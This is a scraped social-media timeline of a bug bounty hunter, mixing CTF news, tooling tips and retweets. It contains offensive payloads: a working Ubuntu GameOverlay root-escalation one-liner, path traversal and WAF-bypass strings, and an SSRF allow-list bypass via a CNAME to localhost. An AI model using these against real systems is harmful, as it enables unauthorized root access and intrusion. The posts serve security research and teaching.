Synack Red Team | Coder | Bug Bounty Hunter Interested in desktops, tabletops, all kinds of tops really.
Joined January 2020
- Tweets 232
- Following 578
- Followers 584
- Likes 399
21 Photos and videos
Sysdum retweeted
Mar 13
WontFix can be an RCE Goldmine
SOAPwn by @chudyPB
#5 in PortSwigger Web Hacking Techniques of 2025
Microsoft’s refusal to patch HttpWebClientProtocol invalid casting makes any .NET app using ServiceDescriptionImporter permanently vulnerable to arbitrary file write via malicious WSDLs.
Blog link 👇
labs.watchtowr.com/soapwn-pw…
1
52
176
12,430
Sysdum retweeted
26 Nov 2025
Critical strike: China's hacking training grounds (PART 1) substack.com/inbox/post/1793…
4
29
5,966
Sysdum retweeted
1 Oct 2025
Using @Burp_Suite and a website playing a new trick on you?
This happens but no fear (most of the times)!
The screenshot here shows a Java TLS limit. Recent JDKs added jdk.tls.maxHandshakeMessageSize (default 32768 bytes)
Use "-Djdk.tls.maxHandshakeMessageSize=65536" to solve this. Add this to the end of the ".vmoptions" file if you have it installed.
#BurpSuite #BugBountyTip
14
169
13,796
Sysdum retweeted
3 Jul 2024
Voting for a President in America be like
"choose one"
1,619
32,868
306,319
20,682,470
28 Jan 2024
If you think you've found a path traversal, instead of throwing /etc/passwd and similar paths, check if the app is java-based using Wappalyzer. I've scored a few bounties by trying the following:
?file=../WEB-INF/web.xml
?file=../META-INF/MANIFEST.MF
#bugbountytips #BugBounty
1
3
388
28 Jan 2024
Additionally, I've run into WAFs blocking or blacklisting any more than 1 directory up (e.g ../../). These paths weren't blocked. Another Java-ish payload is the popular Tomcat/nginx normalization bypass /..;/. I see it mostly present in Java apps
4
130
Finished in 1st place at the Red Team CTF @ #DEFCON 31. @RedTeamVillage_
Started off playing the event solo, but I was joined in the finals by my fellow teammates from Team Europe, @sijsu and @s3np41k1r1t0 to get the win.
Thank you ThreatSims and @hackthebox_eu for the event!
9
7
88
10,078
Sysdum retweeted
13 Aug 2023
🚨 Attention 🚨
We’re asking everyone that was at the RTV CTF today in Cesar’s Forum to CHECK their swag bags. Unfortunately, someone walked away with one belonging to one of one of our volunteers. It is vital that we locate it as it contains his ID etc.
DM us if located! 🙏🏾
1
51
82
18,844
Sysdum retweeted
12 Aug 2023
🙌🏼 Thank you to @flipper_net for adding to our epic RTV CTF prizes!
#defcon
8
94
269
125,747
10 Aug 2023
🔥🔥🔥🔥🔥🔥
10 Aug 2023
4
169
We've recently added jsluice by @bishopfox to our library, a great tool for uncovering URLs, paths, secrets and more from JavaScript with ease.
Have you used it before? Reply about your experience 🗣️
github.com/BishopFox/jsluice
17
62
6,044
Sysdum retweeted
29 Jul 2023
GitHub - vchan-in/CVE-2023-35078-Exploit-POC: CVE-2023-35078 Remote Unauthenticated API Access Vulnerability Exploit POC - github.com/vchan-in/CVE-2023…
29
62
7,568
Sysdum retweeted
28 Jul 2023
Exploit is so easy it fits in a tweet🔥
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'
We found two 0-day vulnerabilities in @Ubuntu kernel and it all started by reading descriptions of old CVEs 📖
Thread about the discovery of #GameOverlay 🧵👇🏼
11
272
881
155,563
Sysdum retweeted
28 Jul 2023
🔴 Red Team Village presents another exclusive interview with our amazing sponsor, @buddobot with @Jhaddix, now available on YouTube! 🔴
📺 Watch the full interview here: youtu.be/ubVLiJ17Sd4
8
40
6,378
Sysdum retweeted
21 Jul 2023
shout out to all the brave engineers who decided to write VPN appliances in C
7
14
175
53,669
25 Mar 2023
Web servers handing you a fake 200 during recon? Pipe the results to a file and use grep -v to pull out garbage responses. You can use | as an OR operator with egrep to filter out WAF/custom 404s.
#bugbountytips #bugbounty
2
2
6
645
25 Mar 2023
You can also use -fc 404 on top of this to eliminate actual 404s as well
104
Sysdum retweeted
23 Mar 2023
8
56
262
39,321
24 Mar 2023
Recently found an SSRF domain white list bypass. The app was looking for vulnerable[.]com in the request.
I made a CNAME on my domain pointing to localhost, allowing for internal service access.
vulnerable[.]com.mydomain[.]com --> 127.0.0.1
#bugbountytip #bugbounty
1
3
246